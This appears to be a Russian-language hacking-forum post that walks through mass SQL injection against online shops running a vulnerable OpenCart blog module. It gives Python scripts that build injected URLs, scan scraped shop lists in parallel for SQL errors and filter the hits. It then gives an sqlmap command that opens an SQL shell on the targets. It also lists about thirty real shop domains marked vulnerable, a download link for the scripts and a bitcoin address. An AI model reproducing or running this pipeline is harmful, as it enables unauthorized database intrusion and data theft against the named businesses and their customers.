Пожалуйста, обратите внимание, что пользователь заблокирован
На основе следующих топиков: https://xss.pro/threads/30928/ , https://xss.pro/threads/80413/
Набросал парочку скриптов для автоматизации действий...
После парсинга линков на шопы добавляем нужный нам путь, в нашем случае путь "index.php?route=extension/d_blog_module/search&tag=xss'", либо другой из списка выложеных 0дэй от grader.
Устанавливаем:
После установки запускаем первый скрипт...
Используем следующий код:
Перед выполнением нужно создать файл "go_check_sql.txt".
Следующим шагом идет проверка на наличие уязвимости. Визуально мы получаем примерно следующую ошибку:
Пишем проверку уже готового списка наших линков на наличие определенного слова.
Для скорости выполнения реализована многопоточность. Значение "max_workers=30" заменяем на свое.
После окончания работы - все линки будут записаны в текстовый документ results.txt с пометками в конце ссылок "есть" "нет".
Избавляемся от ненужных линков, где уязвимость не присутствует - с помощью следующего кода.
На выходе получаем список сайтов (файл est.txt) где было найдено слово 'SQL' (можно заменить на свое), и с помощью уже готового вектора суем в sqlmap.
Окончательный пример работы:
Список скриптов уже в готовом формате .py:
URL: https://anonfiles.com/y2ibQ0abza/membrupt_zip
Пароль: xss
Может что упустил, прошу камнями не кидать, в данный момент лишь учусь и практикуюсь
По мере изучения нового - постараюсь добавлять что либо.
Если есть желание как либо отблагодарить, буду рад каждой копейке
btc: bc1q6u997a52v2nqcfm0dejmm35xvpdjhqfd04x6c8
Набросал парочку скриптов для автоматизации действий...
После парсинга линков на шопы добавляем нужный нам путь, в нашем случае путь "index.php?route=extension/d_blog_module/search&tag=xss'", либо другой из списка выложеных 0дэй от grader.
Устанавливаем:
Код:
pip install requests
pip install ThreadPoolExecutorPlus
После установки запускаем первый скрипт...
Используем следующий код:
Python:
# читаем список сайтов из текстового файла
with open('links.txt', 'r') as file:
sites = file.readlines()
# добавляем путь в конец каждого линка
sites = [site.strip() + "index.php?route=extension/d_blog_module/search&tag=xss'" for site in sites]
# записываем готовый список сайтов в файл
with open('go_check_sql.txt', 'w') as file:
file.write('\n'.join(sites))
Перед выполнением нужно создать файл "go_check_sql.txt".
Следующим шагом идет проверка на наличие уязвимости. Визуально мы получаем примерно следующую ошибку:
Код:
Uncaught Exception: Error: You have an error in your SQL syntax;
Пишем проверку уже готового списка наших линков на наличие определенного слова.
Python:
import requests
import csv
from concurrent.futures import ThreadPoolExecutor
# читаем список сайтов
with open('go_check_sql.txt', 'r') as file:
sites = file.readlines()
# заданное сообщение для поиска
search_text = 'SQL'
# открываем файл для записи результатов
with open('results.txt', 'w', newline='') as file:
writer = csv.writer(file)
# определяем функцию для выполнения запроса и записи результата
def check_site(site):
site = site.strip()
try:
response = requests.get(site)
if response.status_code == 200 and search_text in response.text:
print(f'Сайт {site} имеет SQL-inj')
writer.writerow([site, 'есть'])
else:
print(f'Сайт {site} не имеет SQL-inj')
writer.writerow([site, 'нет'])
except requests.exceptions.RequestException as e:
print(f'Site Error {site}: {e}')
writer.writerow([site, 'ошибка'])
# создаем пул потоков и запускаем выполнение функций
with ThreadPoolExecutor(max_workers=30) as executor:
futures = []
for site in sites:
futures.append(executor.submit(check_site, site))
# ожидаем завершения всех потоков
for future in futures:
future.result()
Для скорости выполнения реализована многопоточность. Значение "max_workers=30" заменяем на свое.
После окончания работы - все линки будут записаны в текстовый документ results.txt с пометками в конце ссылок "есть" "нет".
Избавляемся от ненужных линков, где уязвимость не присутствует - с помощью следующего кода.
Python:
# открываем файл
with open('results.txt', 'r') as input_file:
# читаем все строки в список
lines = input_file.readlines()
# инициализируем список для хранения найденных строк
found_lines = []
# проходим по каждой строке и ищем слово "есть"
for line in lines:
if 'есть' in line:
found_lines.append(line)
# открываем файл для записи
with open('est.txt', 'w') as output_file:
# записываем найденные строки в новый файл
for line in found_lines:
output_file.write(line)
На выходе получаем список сайтов (файл est.txt) где было найдено слово 'SQL' (можно заменить на свое), и с помощью уже готового вектора суем в sqlmap.
Python:
sqlmap.py -u "index.php?route=extension/d_blog_module/search&tag=xss" --dbms="MySQL" --sql-shell --tamper="between" --random-agent --batch --time-sec=10 --level=3 --risk=3
Окончательный пример работы:
Код:
https://www.springbridge.co.uk/blog-search?tag=aaa',есть
https://www.camisetasfutboleses.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://getonthewater.co.uk/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://shop.korea-motors.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.hellfirearmory.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://shop.fiberopticproducts.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://korea-motors.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://smeertechniek.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.wittystore.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://sumorubber.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://www.cmr-direct.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://test.lituanicawholesale.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://silverhook.co.uk/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.springbridge.co.uk/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://hbi.ca/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://alpineperformance.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.westarp-bs.de/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.studio9furniture.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.buyflorals.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://twohotpeppers.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.cdkeysdeals.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://k2minerals.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://bentleyparts.net/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://zonaorthodontics.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://essmak.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://standup22.shop/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://en.standup22.shop/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://buyselldonothing.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://storeitwell.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://elektronikterazionline.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
Список скриптов уже в готовом формате .py:
URL: https://anonfiles.com/y2ibQ0abza/membrupt_zip
Пароль: xss
Может что упустил, прошу камнями не кидать, в данный момент лишь учусь и практикуюсь

По мере изучения нового - постараюсь добавлять что либо.
Если есть желание как либо отблагодарить, буду рад каждой копейке

btc: bc1q6u997a52v2nqcfm0dejmm35xvpdjhqfd04x6c8